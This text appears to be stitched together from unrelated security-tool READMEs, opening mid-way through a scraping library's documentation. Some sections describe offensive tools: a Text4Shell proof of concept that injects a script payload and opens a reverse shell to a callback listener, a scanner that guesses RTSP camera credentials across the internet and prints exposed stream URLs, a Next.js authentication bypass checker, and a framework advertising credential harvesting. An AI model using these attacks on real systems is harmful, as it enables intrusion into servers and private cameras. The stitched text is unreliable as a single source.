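first.save("my_special_element", {"tag": "a"})
print(first is second)
print(second.retrieve("my_special_element"))
```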
[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.
If you like Scrapling and want it to keep improving, then this is a friendly reminder that you can help by supporting me through the sponsor button.
This section addresses common questions about Scrapling. Please read it before opening an issue.
Run a working selector at least once with the `css` or `xpath` methods, with the `auto_save` parameter set to `True`, before structural changes happen.
Now because everything about the element can be changed or removed, nothing from the element can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things:
- The URL you passed while initializing the `Adaptor` object.
- The `identifier` parameter you passed to the method while selecting. If you didn't pass one, the selector string itself will be used as the identifier, but remember that you will have to pass it as the identifier value later when the structure changes and you want to use a new selector.
Together both are used to retrieve the element's unique properties from the database later.
4. Later, when you enable the `auto_match` parameter for both the Adaptor instance and the method call, the element properties are retrieved and Scrapling loops over all elements in the page, compares each one's unique properties to the ones already saved for this element, and calculates a score for each one.
5. Comparing elements is not exact but more about finding how similar these values are, so everything is taken into consideration, even the values' order, like the order in which the element class names were written before and the order in which the same element class names are written now.
6. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.
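Steps 4 to 6 can be illustrated with a small similarity-scoring sketch built on `difflib`. This is not Scrapling's algorithm: the property names, the equal weighting, and the use of `SequenceMatcher` are all assumptions chosen to show order-sensitive, inexact comparison.

```python
from difflib import SequenceMatcher


def similarity(a, b):
    """Ratio in [0, 1]; order-sensitive, so reordered values score lower."""
    return SequenceMatcher(None, a, b).ratio()


def score(saved, candidate):
    """Average the similarity of each saved property against the candidate's."""
    parts = [
        similarity(saved["tag"], candidate["tag"]),
        similarity(saved["text"], candidate["text"]),
        similarity(saved["classes"], candidate["classes"]),  # lists compare in order
        similarity(saved["path"], candidate["path"]),
    ]
    return sum(parts) / len(parts)


def best_matches(saved, candidates):
    """Return every candidate that shares the highest score."""
    scored = [(score(saved, candidate), candidate) for candidate in candidates]
    top = max(value for value, _ in scored)
    return [candidate for value, candidate in scored if value == top]


# Properties saved before the redesign (hypothetical values).
saved = {
    "tag": "article",
    "text": "Product 1",
    "classes": ["product"],
    "path": ["html", "body", "div", "section", "article"],
}

# Elements found after the redesign.
new_path = ["html", "body", "div", "div", "section", "article"]
product_1 = {"tag": "article", "text": "Product 1", "classes": ["product", "new-class"], "path": new_path}
product_2 = {"tag": "article", "text": "Product 2", "classes": ["product", "new-class"], "path": new_path}
description = {"tag": "p", "text": "Description 1", "classes": ["new-description"], "path": new_path + ["div", "p"]}

print(best_matches(saved, [product_1, product_2, description]))
```

No single property has to match exactly; the element that stays closest overall wins, which is why the `id` changing to `data-id` does not break the lookup.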
Not a big problem as it depends on your usage. The word `default` will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you later use the same identifier for a different website for which you also didn't pass the URL parameter while initializing. The save process will overwrite the previous data, and auto-matching uses the latest saved properties only.
For each element, Scrapling will extract:
- Element tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only).
- Element's parent tag name, attributes (names and values), and text.
I passed the `auto_save`/`auto_match` parameter while selecting and it got completely ignored with a warning message
That's because passing the `auto_save`/`auto_match` argument without setting `auto_match` to `True` while initializing the Adaptor object will only result in ignoring the `auto_save`/`auto_match` argument value. This behavior is purely for performance reasons so the database gets created only when you are planning to use the auto-matching features.
It could be one of these reasons:
1. No data were saved/stored for this element before.
2. The selector passed is not the one used while storing element data. The solution is simple:
   - Pass the old selector again as an identifier to the method called.
   - Retrieve the element with the retrieve method using the old selector as identifier, then save it again with the save method and the new selector as identifier.
   - Start using the identifier argument more often if you are planning to use every new selector from now on.
3. The website had some extreme structural changes like a new full design. If this happens a lot with this website, the solution would be to make your code as selector-free as possible using Scrapling features.
Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.
Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.
Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its state.
Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!
Please read the contributing file before doing anything.
[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the `robots.txt` file, for example.
This work is licensed under BSD-3
This project includes code adapted from:
- Parsel (BSD License): used for the translator submodule
VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.
go install github.com/iqzer0/vulnknox@latest
Before using the tool, you need to set up your configuration:
API Key
Obtain your KNOXSS API key from knoxss.me.
On the first run, a default configuration file will be created at:
Linux/macOS: ~/.config/vulnknox/config.json
Windows: %APPDATA%\VulnKnox\config.json
Edit the config.json file and replace YOUR_API_KEY_HERE with your actual API key.
Discord Webhook (Optional)
If you want to receive notifications on Discord, add your webhook URL to the config.json file or use the -dw flag.
Usage of vulnknox:
-u Input URL to send to KNOXSS API
-i Input file containing URLs to send to KNOXSS API
-X GET HTTP method to use: GET, POST, or BOTH
-pd POST data in format 'param1=value&param2=value'
-headers Custom headers in format 'Header1:value1,Header2:value2'
-afb Use Advanced Filter Bypass
-checkpoc Enable CheckPoC feature
-flash Enable Flash Mode
-o The file to save the results to
-ow Overwrite output file if it exists
-oa Output all results to file, not just successful ones
-s Only show successful XSS payloads in output
-p 3 Number of parallel processes (1-5)
-t 600 Timeout for API requests in seconds
-dw Discord Webhook URL (overrides config file)
-r 3 Number of retries for failed requests
-ri 30 Interval between retries in seconds
-sb 0 Skip domains after this many 403 responses
-proxy Proxy URL (e.g., http://127.0.0.1:8080)
-v Verbose output
-version Show version number
-no-banner Suppress the banner
-api-key KNOXSS API Key (overrides config file)
Test a single URL using GET method:
vulnknox -u "https://example.com/page?param=value"
Test a URL with POST data:
vulnknox -u "https://example.com/submit" -X POST -pd "param1=value1&param2=value2"
Enable Advanced Filter Bypass and Flash Mode:
vulnknox -u "https://example.com/page?param=value" -afb -flash
Use custom headers (e.g., for authentication):
vulnknox -u "https://example.com/secure" -headers "Cookie:sessionid=abc123"
Process URLs from a file with 5 concurrent processes:
vulnknox -i urls.txt -p 5
Send notifications to Discord on successful XSS findings:
vulnknox -u "https://example.com/page?param=value" -dw "https://discord.com/api/webhooks/your/webhook/url"
Test both GET and POST methods with CheckPoC enabled:
vulnknox -u "https://example.com/page" -X BOTH -checkpoc
Use a proxy and increase the number of retries:
vulnknox -u "https://example.com/page?param=value" -proxy "http://127.0.0.1:8080" -r 5
Suppress the banner and only show successful XSS payloads:
vulnknox -u "https://example.com/page?param=value" -no-banner -s
[ XSS! ]: Indicates a successful XSS payload was found.
[ SAFE ]: No XSS vulnerability was found in the target.
[ ERR! ]: An error occurred during the request.
[ SKIP ]: The domain or URL was skipped due to multiple failed attempts (e.g., after receiving too many 403 Forbidden responses as specified by the -sb option).
[BALANCE]: Indicates your current API usage with KNOXSS, showing how many API calls you've used out of your total allowance.
The tool also provides a summary at the end of execution, including the number of requests made, successful XSS findings, safe responses, errors, and any skipped domains.
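The status tags above lend themselves to simple post-processing. The following is a minimal Python sketch, not part of VulnKnox: it assumes each result line in a saved log starts with one of the bracketed tags, and both the `tally_statuses` helper and the sample lines (including what follows each tag) are hypothetical.

```python
import re
from collections import Counter

# Tags taken from the list above; whitespace inside the brackets is tolerated.
TAG_PATTERN = re.compile(r"^\[\s*(XSS!|SAFE|ERR!|SKIP|BALANCE)\s*\]")


def tally_statuses(lines):
    """Count how many lines start with each known status tag."""
    counts = Counter()
    for line in lines:
        match = TAG_PATTERN.match(line.strip())
        if match:
            counts[match.group(1)] += 1
    return counts


if __name__ == "__main__":
    # Hypothetical log lines; the real text after each tag may differ.
    sample = [
        "[ XSS! ]: https://example.com/page?param=value",
        "[ SAFE ]: https://example.com/other",
        "[ SAFE ]: https://example.com/third",
        "[BALANCE]: 3/500",
    ]
    for tag, count in tally_statuses(sample).items():
        print(f"{tag}: {count}")
```

Lines that do not begin with a known tag (banner text, the final summary) are simply ignored, so the sketch can be pointed at a full console capture.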
Contributions are welcome! If you have suggestions for improvements or encounter any issues, please open an issue or submit a pull request.
This project is licensed under the MIT License.
Camtruder is a high-performance RTSP camera discovery and vulnerability assessment tool written in Go. It efficiently scans and identifies vulnerable RTSP cameras across networks using various authentication methods and path combinations, with support for both targeted and internet-wide scanning capabilities.
Raw CIDR output for integration with other tools
Screenshot Capability
Configurable output directory
Location-Based Search
Raw output mode for scripting
Comprehensive Authentication Testing
Credential validation system
Smart Path Discovery
Automatic path validation
High Performance Architecture
Parallel connection handling
Advanced Output & Analysis
go install github.com/ALW1EZ/camtruder@v3.7.0
git clone https://github.com/ALW1EZ/camtruder.git
cd camtruder
go build
# Scan a single IP
./camtruder -t 192.168.1.100
# Scan a network range
./camtruder -t 192.168.1.0/24
# Search by location with detailed output
./camtruder -t london -s
> [ NET-ISP ] [ 192.168.1.0/24 ] [256]
# Get raw CIDR ranges for location
./camtruder -t london -ss
> 192.168.1.0/24
# Scan multiple IPs from file
./camtruder -t targets.txt
# Take screenshots of discovered cameras
./camtruder -t 192.168.1.0/24 -m screenshots
# Pipe from port scanners
naabu -host 192.168.1.0/24 -p 554 | camtruder
masscan 192.168.1.0/24 -p554 --rate 1000 | awk '{print $6}' | camtruder
zmap -p554 192.168.0.0/16 | camtruder
# Internet scan (scan till 100 hits)
./camtruder -t 100
# Custom credentials with increased threads
./camtruder -t 192.168.1.0/24 -u admin,root -p pass123,admin123 -w 50
# Location search with raw output piped to zmap
./camtruder -t berlin -ss | while read range; do zmap -p 554 $range; done
# Save results to file (as full url, you can use mpv --playlist=results.txt to watch the streams)
./camtruder -t istanbul -o results.txt
# Internet scan with limit of 50 workers and verbose output
./camtruder -t 100 -w 50 -v
Option | Description | Default |
---|---|---|
-t | Target IP, CIDR range, location, or file | Required |
-u | Custom username(s) | Built-in list |
-p | Custom password(s) | Built-in list |
-w | Number of threads | 20 |
-to | Connection timeout (seconds) | 5 |
-o | Output file path | None |
-v | Verbose output | False |
-s | Search only - shows ranges with netnames | False |
-ss | Raw IP range output - only CIDR ranges | False |
-po | RTSP port | 554 |
-m | Directory to save screenshots (requires ffmpeg) | None |
[ TR-NET-ISP ] [ 193.3.52.0/24 ] [256]
[ EXAMPLE-ISP ] [ 212.175.100.136/29 ] [8]
193.3.52.0/24
212.175.100.136/29
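The search output above pairs a netname with a CIDR range and an address count. As a hedged illustration of how such lines could be consumed by a script, the sketch below parses the bracketed format and checks the count against the size of the range using Python's standard `ipaddress` module. The `parse_search_line` helper is hypothetical, and the assumption that the last bracket holds the number of addresses in the range is inferred from the samples only.

```python
import ipaddress
import re

# Matches lines shaped like: [ NETNAME ] [ CIDR ] [COUNT]
LINE_PATTERN = re.compile(
    r"^\[\s*(.+?)\s*\]\s*\[\s*(.+?)\s*\]\s*\[\s*(\d+)\s*\]$"
)


def parse_search_line(line):
    """Return (netname, network, count) or None if the line does not match."""
    match = LINE_PATTERN.match(line.strip())
    if match is None:
        return None
    netname, cidr, count = match.groups()
    network = ipaddress.ip_network(cidr, strict=False)
    return netname, network, int(count)


if __name__ == "__main__":
    for raw in (
        "[ TR-NET-ISP ] [ 193.3.52.0/24 ] [256]",
        "[ EXAMPLE-ISP ] [ 212.175.100.136/29 ] [8]",
    ):
        netname, network, count = parse_search_line(raw)
        # Compare the reported count with the size of the CIDR range.
        print(netname, network, count == network.num_addresses)
```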
╭─ Found vulnerable camera [Hikvision, H264, 30fps]
├ Host : 192.168.1.100:554
├ Geo  : United States/California/Berkeley
├ Auth : admin:12345
├ Path : /Streaming/Channels/1
╰ URL  : rtsp://admin:12345@192.168.1.100:554/Streaming/Channels/1
This tool is intended for security research and authorized testing only. Users are responsible for ensuring they have permission to scan target systems and comply with all applicable laws and regulations.
This project is licensed under the MIT License - see the LICENSE file for details.
Made by @ALW1EZ
Frogy 2.0 is an automated external reconnaissance and Attack Surface Management (ASM) toolkit designed to map out an organization's entire internet presence. It identifies assets, IP addresses, web applications, and other metadata across the public internet and then prioritizes them from highest (most attractive) to lowest (least attractive) from an attacker's perspective.
Comprehensive recon:
Aggregate subdomains and assets using multiple tools (CHAOS, Subfinder, Assetfinder, crt.sh) to map an organization's entire digital footprint.
Live asset verification:
Validate assets with live DNS resolution and port scanning (using DNSX and Naabu) to confirm what is publicly reachable.
In-depth web recon:
Collect detailed HTTP response data (via HTTPX) including metadata, technology stack, status codes, content lengths, and more.
Smart prioritization:
Use a composite scoring system that considers homepage status, login identification, technology stack, DNS data, and more to generate a risk score for each asset, helping bug bounty hunters and pentesters focus on the most promising targets first.
Professional reporting:
Generate a dynamic, colour-coded HTML report with a modern design and dark/light theme toggle.
In this tool, risk scoring is based on the notion of asset attractiveness: the idea that certain attributes or characteristics make an asset more interesting to attackers. If we see more of these attributes, the overall score goes up, indicating a broader "attack surface" that adversaries could leverage. Below is an overview of how each factor contributes to the final risk score.
When the homepage returns 200 OK, it often means the page is legitimately reachable and responding with content. A 200 OK is more interesting to attackers than a 404 or a redirect, so a 200 status modestly increases the risk.
Strict-Transport-Security (HSTS)
X-Frame-Options
Content-Security-Policy
X-XSS-Protection
Referrer-Policy
Permissions-Policy
Missing or disabled headers mean an endpoint is more prone to common web exploits. Each absent header increments the score.
Each factor above contributes one or more points to the final risk score. For example:
Once all factors are tallied, we get a numeric risk score. A higher score means the asset is more interesting to an attacker and potentially gives pentesters more room to test.
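To make the tallying idea concrete, here is a minimal Python sketch of an additive score. It is not Frogy's actual implementation: the header names come from the list above, but the one-point-per-factor weights, the `has_login` flag, and both function names are assumptions chosen for illustration.

```python
# Header names taken from the list above.
SECURITY_HEADERS = (
    "Strict-Transport-Security",
    "X-Frame-Options",
    "Content-Security-Policy",
    "X-XSS-Protection",
    "Referrer-Policy",
    "Permissions-Policy",
)


def missing_security_headers(response_headers):
    """Return the expected security headers that are absent (case-insensitive)."""
    present = {name.lower() for name in response_headers}
    return [name for name in SECURITY_HEADERS if name.lower() not in present]


def attractiveness_score(status_code, response_headers, has_login=False):
    """Toy score: one point per factor. The weights are illustrative assumptions."""
    score = 1 if status_code == 200 else 0
    score += len(missing_security_headers(response_headers))
    if has_login:
        score += 1
    return score


if __name__ == "__main__":
    headers = {
        "Content-Security-Policy": "default-src 'self'",
        "X-Frame-Options": "DENY",
    }
    print("missing:", missing_security_headers(headers))
    print("score:", attractiveness_score(200, headers, has_login=True))
```

Keeping each factor as a separate, additive term makes it easy to see why a given asset ranked high, which is the point of the prioritization.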
Why This Matters
This approach helps you quickly prioritize which assets warrant deeper testing. Subdomains with high counts of open ports, advanced internal usage, missing headers, or login panels are more complex, more privileged, or more likely to be misconfigured; therefore, your security team can focus on those first.
Clone the repository and run the installer script to set up all dependencies and tools:
chmod +x install.sh
./install.sh
chmod +x frogy.sh
./frogy.sh domains.txt
https://www.youtube.com/watch?v=LHlU4CYNj1M
____ _ _
| _ \ ___ __ _ __ _ ___ _ _ ___| \ | |
| |_) / _ \/ _` |/ _` / __| | | / __| \| |
| __/ __/ (_| | (_| \__ \ |_| \__ \ |\ |
|_| \___|\__, |\__,_|___/\__,_|___/_| \_|
|___/
PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more.
This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.
PEGASUS-NEO - Advanced Penetration Testing Framework
Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.
This software is proprietary and confidential. Unauthorized copying, transfer, or
reproduction of this software, via any medium is strictly prohibited.
Written by Letda Kes dr. Sobri <muhammadsobrimaulana31@gmail.com>, January 2024
Password: Sobri
Social media tracking
Exploitation & Pentesting
Custom payload generation
Wireless Attacks
WPS exploitation
Web Attacks
CMS scanning
Social Engineering
Credential harvesting
Tracking & Analysis
# Clone the repository
git clone https://github.com/sobri3195/pegasus-neo.git
# Change directory
cd pegasus-neo
# Install dependencies
sudo python3 -m pip install -r requirements.txt
# Run the tool
sudo python3 pegasus_neo.py
sudo python3 pegasus_neo.py
This is a proprietary project and contributions are not accepted at this time.
For support, please email muhammadsobrimaulana31@gmail.com or visit https://lynk.id/muhsobrimaulana
This project is protected under proprietary license. See the LICENSE file for details.
Made with ❤️ by Letda Kes dr. Sobri
A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.
In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.
Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.
This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.
Tested against:
- Apache Commons Text < 1.10.0
- Java applications using ${script:...} interpolation from untrusted input
python3 text4shell.py <target_ip> <callback_ip> <callback_port>
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
nc -nlvp 4444
The script injects:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
The reverse shell is sent via /data parameter using a POST request.
A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927).
The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by sending a custom x-middleware-subrequest header.
Next.js versions affected:
- 11.1.4 and up
[!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.
Clone the repo
git clone https://github.com/takumade/ghost-route.git
cd ghost-route
Create and activate virtual environment
python -m venv .venv
source .venv/bin/activate
Install dependencies
pip install -r requirements.txt
python ghost-route.py <url> <path> <show_headers>
<url>: Base URL of the Next.js site (e.g., https://example.com)
<path>: Protected path to test (default: /admin)
<show_headers>: Show response headers (default: False)
Basic Example
python ghost-route.py https://example.com /admin
Show Response Headers
python ghost-route.py https://example.com /admin True
MIT License
Bytes Revealer is a powerful reverse engineering and binary analysis tool designed for security researchers, forensic analysts, and developers. With features like hex view, visual representation, string extraction, entropy calculation, and file signature detection, it helps users uncover hidden data inside files. Whether you are analyzing malware, debugging binaries, or investigating unknown file formats, Bytes Revealer makes it easy to explore, search, and extract valuable information from any binary file.
Bytes Revealer does NOT store any file or data. All analysis is performed in your browser.
Current limitation: files smaller than 50MB get the full analysis; larger files, up to 1.5GB, are limited to Visual View and Hex View.
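Entropy calculation, one of the features listed above, is easy to illustrate. The sketch below computes Shannon entropy in bits per byte with the standard formula; it is written in Python for illustration and is not taken from Bytes Revealer, which runs in the browser. The function name is an assumption.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)  # frequency of each byte value
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


if __name__ == "__main__":
    print(shannon_entropy(b"\x00" * 64))       # a single repeated byte value
    print(shannon_entropy(bytes(range(256))))  # every byte value exactly once
    print(shannon_entropy(b"hello world"))
```

Values close to 8 suggest compressed or encrypted content, while low values suggest padding or highly repetitive data, which is why entropy is a common first look at an unknown binary.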
# Node.js 14+ is required
node -v
docker-compose build --no-cache
docker-compose up -d
Now open your browser: http://localhost:8080/
To stop the docker container
docker-compose down
# Clone the repository
git clone https://github.com/vulnex/bytesrevealer
# Navigate to project directory
cd bytesrevealer
# Install dependencies
npm install
# Start development server
npm run dev
# Build the application
npm run build
# Preview production build
npm run preview
Progress bar shows upload and analysis status
Analysis Views
Real-time updates as you navigate
Search Functions
Results are highlighted in the current view
String Analysis
git checkout -b feature/AmazingFeature
git commit -m 'Add some AmazingFeature'
git push origin feature/AmazingFeature
This project is licensed under the MIT License - see the LICENSE.md file for details.
Follow these steps to set up and run the API project:
git clone https://github.com/adriyansyah-mf/CentralizedFirewall
cd CentralizedFirewall
Configure the .env file: update the environment variables in .env according to your configuration.
nano .env
docker compose up -d
This will start the API in detached mode.
Check if the containers are up:
docker ps
docker compose down
docker compose restart
sudo dpkg -i firewall-client_deb.deb
nano /usr/local/bin/config.ini
[settings]
api_url = API-URL
api_key = API-KEY
hostname = Node Hostname (make it unique and same as the hostname on the SIEM)
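Before starting the agent, it can help to confirm that the three settings above are present. The following is a minimal sketch using Python's standard `configparser`. It is not part of the firewall client: the `load_agent_settings` helper and the sample values are hypothetical, and only the section and key names are taken from the config shown above.

```python
import configparser

# Key names taken from the [settings] block above.
REQUIRED_KEYS = ("api_url", "api_key", "hostname")


def load_agent_settings(text):
    """Parse config.ini text and return the [settings] values as a dict."""
    # interpolation=None so that '%' characters in an API key are kept literally.
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    if not parser.has_section("settings"):
        raise ValueError("missing [settings] section")
    settings = dict(parser["settings"])
    missing = [key for key in REQUIRED_KEYS if not settings.get(key, "").strip()]
    if missing:
        raise ValueError("missing settings: " + ", ".join(missing))
    return settings


if __name__ == "__main__":
    # Hypothetical values for illustration only.
    sample = """
[settings]
api_url = http://api-server:8000
api_key = example-key
hostname = node-01
"""
    print(load_agent_settings(sample))
```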
systemctl daemon-reload
systemctl start firewall-agent
systemctl status firewall-agent
Username: admin
Password: admin
You can change the default credential on the setting page
curl -X 'POST' \
'http://api-server:8000/general/add-ip?ip=123.1.1.99&hostname=test&apikey=apikey&comment=log' \
-H 'accept: application/json' \
-d ''
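The same request URL can be assembled programmatically. The sketch below only builds and validates the URL; it does not send anything. The endpoint path and parameter names are copied from the curl example above, while the `build_add_ip_url` helper is a hypothetical name and the IP validation step is an added assumption about what a caller would want.

```python
import ipaddress
from urllib.parse import urlencode


def build_add_ip_url(base_url, ip, hostname, apikey, comment):
    """Build the /general/add-ip URL with properly encoded query parameters."""
    ipaddress.ip_address(ip)  # raises ValueError if the IP is malformed
    query = urlencode(
        {"ip": ip, "hostname": hostname, "apikey": apikey, "comment": comment}
    )
    return f"{base_url.rstrip('/')}/general/add-ip?{query}"


if __name__ == "__main__":
    print(build_add_ip_url("http://api-server:8000", "123.1.1.99", "test", "apikey", "log"))
```

Using `urlencode` instead of string concatenation keeps comments containing spaces or `&` from corrupting the query string.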
You can see the swagger documentation on the following link
http://api-server:8000/docs
DB=changeme
JWT_SECRET=changeme
PASSWORD_SALT=changeme
PASSWORD_TOKEN_KEY=changeme
OPENCTI_URL=changeme
OPENCTI_TOKEN=changeme
If you find this project helpful, consider supporting me through GitHub Sponsors
OWASP Maryam is a modular open-source framework based on OSINT and data gathering. It is designed to provide a robust environment to harvest data from open sources and search engines quickly and thoroughly.
$ pip install maryam
Alternatively, you can install the latest version with the following command (Recommended):
pip install git+https://github.com/saeeddhqan/maryam.git
# Using dns_search. --max means all of resources. --api shows the results as json.
# .. -t means use multi-threading.
maryam -e dns_search -d ibm.com -t 5 --max --api --form
# Using youtube. -q means query
maryam -e youtube -q "<QUERY>"
maryam -e google -q "<QUERY>"
maryam -e dnsbrute -d domain.tld
# Show framework modules
maryam -e show modules
# Set framework options.
maryam -e set proxy ..
maryam -e set agent ..
maryam -e set timeout ..
# Run web API
maryam -e web api 127.0.0.1 1313
Here is a start guide: Development Guide. You can add a new search engine to the util classes or use the current search engines to write a new module. The best way to learn how to write a new module is to study the existing modules.
To report bugs, requests, or any other issues please create an issue.
Welcome to TruffleHog Explorer, a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog. TruffleHog is one of the most powerful open source tools for secrets discovery, classification, validation, and analysis. In this context, a secret refers to a credential a machine uses to authenticate itself to another machine. This includes API keys, database passwords, private encryption keys, and more.
With an improved UI/UX, powerful filtering options, and export capabilities, this tool helps security professionals efficiently review potential secrets and credentials found in their repositories.
⚠️ This dashboard has been tested only with GitHub TruffleHog JSON outputs. Expect updates soon to support additional formats and platforms.
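For a quick look at a TruffleHog JSON output before loading it into the dashboard, a small script can summarize it. The sketch below assumes the output has one JSON object per line and that each finding carries `DetectorName` and `Verified` fields; treat both as assumptions to check against your own file. The `summarize_findings` helper is hypothetical and not part of TruffleHog Explorer.

```python
import json
from collections import Counter


def summarize_findings(lines):
    """Count findings per detector and how many are marked verified."""
    by_detector = Counter()
    verified = 0
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            finding = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip log lines or other non-JSON output
        if not isinstance(finding, dict):
            continue
        by_detector[finding.get("DetectorName", "unknown")] += 1
        if finding.get("Verified"):
            verified += 1
    return by_detector, verified


if __name__ == "__main__":
    # Hypothetical findings for illustration only.
    sample = [
        '{"DetectorName": "AWS", "Verified": true}',
        '{"DetectorName": "AWS", "Verified": false}',
        '{"DetectorName": "Slack", "Verified": false}',
    ]
    detectors, verified_count = summarize_findings(sample)
    print(dict(detectors), "verified:", verified_count)
```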
You can use online version here: TruffleHog Explorer
$ git clone https://github.com/yourusername/trufflehog-explorer.git
$ cd trufflehog-explorer
Simply open the index.html file in your preferred web browser.
$ open index.html
Load the .json files from TruffleHog output.
Happy Securing!
Clone the repository:
git clone https://github.com/ALW1EZ/PANO.git
cd PANO
Run the application:
./start_pano.sh
start_pano.bat
The startup script will automatically:
- Check for updates
- Set up the Python environment
- Install dependencies
- Launch PANO
To use the Email Lookup transform, you need to log in with GHunt first. After starting PANO via the starter scripts:
source venv/bin/activate
call venv\Scripts\activate
Visual node and edge styling
Timeline Analysis
Temporal relationship analysis
Map Integration
Connected services discovery
Username Analysis
Web presence analysis
Image Analysis
Entities are the fundamental building blocks of PANO. They represent distinct pieces of information that can be connected and analyzed:
Text: Generic text content
Properties System
Transforms are automated operations that process entities to discover new information and relationships:
Enrichment: Add data to existing entities
Features
Helpers are specialized tools with dedicated UIs for specific investigation tasks:
Translator: Translate text between languages
Helper Features
We welcome contributions! To contribute to PANO:
Note: We use a single main branch for development. All pull requests should be made directly to main.
from dataclasses import dataclass
from typing import ClassVar, Dict, Any
from .base import Entity

@dataclass
class PhoneNumber(Entity):
    name: ClassVar[str] = "Phone Number"
    description: ClassVar[str] = "A phone number entity with country code and validation"

    def init_properties(self):
        """Initialize phone number properties"""
        self.setup_properties({
            "number": str,
            "country_code": str,
            "carrier": str,
            "type": str,  # mobile, landline, etc.
            "verified": bool
        })

    def update_label(self):
        """Update the display label"""
        self.label = self.format_label(["country_code", "number"])
### Custom Transforms
Transforms are operations that process entities and generate new insights or relationships. To create a custom transform:
1. Create a new file in the `transforms` folder (e.g., `transforms/phone_lookup.py`)
2. Implement your transform class:

from dataclasses import dataclass
from typing import ClassVar, List
from .base import Transform
from entities.base import Entity
from entities.phone_number import PhoneNumber
from entities.location import Location
from ui.managers.status_manager import StatusManager

@dataclass
class PhoneLookup(Transform):
    name: ClassVar[str] = "Phone Number Lookup"
    description: ClassVar[str] = "Lookup phone number details and location"
    input_types: ClassVar[List[str]] = ["PhoneNumber"]
    output_types: ClassVar[List[str]] = ["Location"]

    async def run(self, entity: PhoneNumber, graph) -> List[Entity]:
        if not isinstance(entity, PhoneNumber):
            return []
        status = StatusManager.get()
        operation_id = status.start_loading("Phone Lookup")
        try:
            # Your phone number lookup logic here
            # Example: query an API for phone number details
            location = Location(properties={
                "country": "Example Country",
                "region": "Example Region",
                "carrier": "Example Carrier",
                "source": "PhoneLookup transform"
            })
            return [location]
        except Exception as e:
            status.set_text(f"Error during phone lookup: {str(e)}")
            return []
        finally:
            status.stop_loading(operation_id)
### Custom Helpers
Helpers are specialized tools that provide additional investigation capabilities through a dedicated UI interface. To create a custom helper:
1. Create a new file in the `helpers` folder (e.g., `helpers/data_analyzer.py`)
2. Implement your helper class:

from PySide6.QtWidgets import (
    QWidget, QVBoxLayout, QHBoxLayout, QPushButton,
    QTextEdit, QLabel, QComboBox
)
from .base import BaseHelper
from qasync import asyncSlot

class DummyHelper(BaseHelper):
    """A dummy helper for testing"""
    name = "Dummy Helper"
    description = "A dummy helper for testing"

    def setup_ui(self):
        """Initialize the helper's user interface"""
        # Create input text area
        self.input_label = QLabel("Input:")
        self.input_text = QTextEdit()
        self.input_text.setPlaceholderText("Enter text to process...")
        self.input_text.setMinimumHeight(100)
        # Create operation selector
        operation_layout = QHBoxLayout()
        self.operation_label = QLabel("Operation:")
        self.operation_combo = QComboBox()
        self.operation_combo.addItems(["Uppercase", "Lowercase", "Title Case"])
        operation_layout.addWidget(self.operation_label)
        operation_layout.addWidget(self.operation_combo)
        # Create process button
        self.process_btn = QPushButton("Process")
        self.process_btn.clicked.connect(self.process_text)
        # Create output text area
        self.output_label = QLabel("Output:")
        self.output_text = QTextEdit()
        self.output_text.setReadOnly(True)
        self.output_text.setMinimumHeight(100)
        # Add widgets to main layout
        self.main_layout.addWidget(self.input_label)
        self.main_layout.addWidget(self.input_text)
        self.main_layout.addLayout(operation_layout)
        self.main_layout.addWidget(self.process_btn)
        self.main_layout.addWidget(self.output_label)
        self.main_layout.addWidget(self.output_text)
        # Set dialog size
        self.resize(400, 500)

